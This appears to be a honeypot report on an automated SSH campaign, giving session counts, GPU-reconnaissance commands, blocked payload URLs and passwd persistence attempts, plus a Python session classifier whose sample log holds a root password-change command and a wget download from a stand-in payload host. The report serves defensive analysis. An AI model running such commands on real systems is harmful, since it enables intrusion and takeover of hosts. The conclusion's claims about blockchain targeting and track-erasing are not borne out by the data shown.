Global figures for the period

SSH sessions: 28,112
Unique IPs: 151
Unique usernames tried: 360
Commands logged: 22,647
Active period: 2026-06-11 to 2026-06-13

Types of events logged

| Event type | Count | Description |
|---|---|---|
| connection | 30,211 | SSH authentication attempts |
| command | 22,647 | Commands executed in interactive sessions |
| credential_probe / probe | | Probes without complete credentials |

SSH clients: mass automation

| SSH client | Connections | % of total |
|---|---|---|
| SSH-2.0-Go (main scanner) | 27,942 | 99.5% |
| PuTTY | 44 | 0.16% |
| OpenSSH | 10 | 0.04% |
| libssh | 10 | 0.04% |
| Others | 71 | 0.25% |

Most frequent commands

The command distribution reveals the main objective of the dominant campaign: GPU hardware reconnaissance.

| # | Command | Executions | % of total |
|---|---|---|---|
| 1 | lspci | 7,065 | 31.2% |
| 2 | uname | 6,954 | 30.7% |
| 3 | nvidia-smi | 4,480 | 19.8% |
| 4 | uptime | 2,356 | 10.4% |
| 5 | echo | 967 | 4.3% |

Sessions without commands: authentication only

Pure credential stuffing sessions

5,465 sessions (19.4% of the total) executed no commands at all — they only authenticated and disconnected. These are credential-validation sessions: the scanner tries the username/password pair and, if it fails, moves on to the next. If it succeeds, it saves the valid credentials for a second exploitation phase.

Payloads and download attempts

Observed payload URLs

https://14.46.[REDACTED].77/sh — 1 attempt + 1 download (0 bytes executed)

http://[REDACTED].sh/x — 3 attempts + 3 downloads (0 bytes executed)

All execution attempts were blocked — the payload never ran on the real host.

Sessions with privilege escalation attempts

Password change attempts

104 sessions (0.4% of the total) ran the passwd command — attempts to change the root password to establish persistence without installing any binary.
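
An added example, not CipherSentry's own tooling: one way to derive the session categories reported above (authentication-only, GPU reconnaissance, payload download attempts, passwd changes) and their share of sessions from a command log. The JSON-lines schema, the tag names and the sample events are assumptions constructed for illustration.

```python
import json
import re
from collections import Counter

# Constructed sample events, not honeypot data. The JSON-lines schema
# (session / type / command) is an assumption made for this example.
SAMPLE_LOG = """
{"session": "s1", "type": "connection"}
{"session": "s2", "type": "connection"}
{"session": "s2", "type": "command", "command": "uname -a; lspci | grep -i vga; /usr/bin/nvidia-smi -L"}
{"session": "s3", "type": "connection"}
{"session": "s3", "type": "command", "command": "echo x | passwd --stdin root"}
{"session": "s4", "type": "connection"}
{"session": "s4", "type": "command", "command": "uptime && wget -q http://payload.example/x"}
"""

GPU_RECON = {"lspci", "nvidia-smi"}
URL_RE = re.compile(r"https?://\S+")
SPLIT_RE = re.compile(r"\|\||&&|[|;&]")  # shell stage separators

def programs(command_line):
    """Program name of every stage of a shell command line, path stripped."""
    stages = (stage.split() for stage in SPLIT_RE.split(command_line))
    return {words[0].rsplit("/", 1)[-1] for words in stages if words}

def classify(log_text):
    """Return {session id: sorted behaviour tags} for a JSON-lines log."""
    commands = {}
    for line in filter(str.strip, log_text.splitlines()):
        event = json.loads(line)
        if event["type"] in ("connection", "command"):  # other event types are ignored
            cmds = commands.setdefault(event["session"], [])
            if event["type"] == "command":
                cmds.append(event["command"])
    tagged = {}
    for sid, cmds in commands.items():
        tags = set() if cmds else {"auth_only"}
        for cmd in cmds:
            progs = programs(cmd)
            hits = {"gpu_recon": progs & GPU_RECON, "passwd_change": "passwd" in progs,
                    "download_attempt": URL_RE.search(cmd)}
            tags.update(name for name, hit in hits.items() if hit)
        tagged[sid] = sorted(tags)
    return tagged

def tag_shares(log_text):
    sessions = classify(log_text)
    counts = Counter(tag for tags in sessions.values() for tag in tags)
    return {tag: round(100 * n / len(sessions), 1) for tag, n in counts.items()}
```

Matching on the program name of each pipeline stage, rather than on a substring of the whole line, keeps a command such as `cat /etc/passwd` from being counted as a password change.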

Conclusion

Our honeypot captures a clear picture of the active threat on the internet: a well-organized automated campaign, aimed at blockchain infrastructure, operating with custom Go tooling and specialized dictionaries. The 151 recorded IPs are not independent — they are nodes of a single operation with a division of tasks.

What sets this analysis apart from generic "SSH attacks" statistics: granularity. We don't just know how many attacks there were — we know which credentials they tried, which commands they ran, what hardware they were looking for and how they tried to erase their tracks.

Data collected for cybersecurity research purposes. All information comes from unsolicited activity recorded on our own infrastructure.

Data source · live update
honeypot CipherSentry · period: 2026-06-11 — 2026-06-13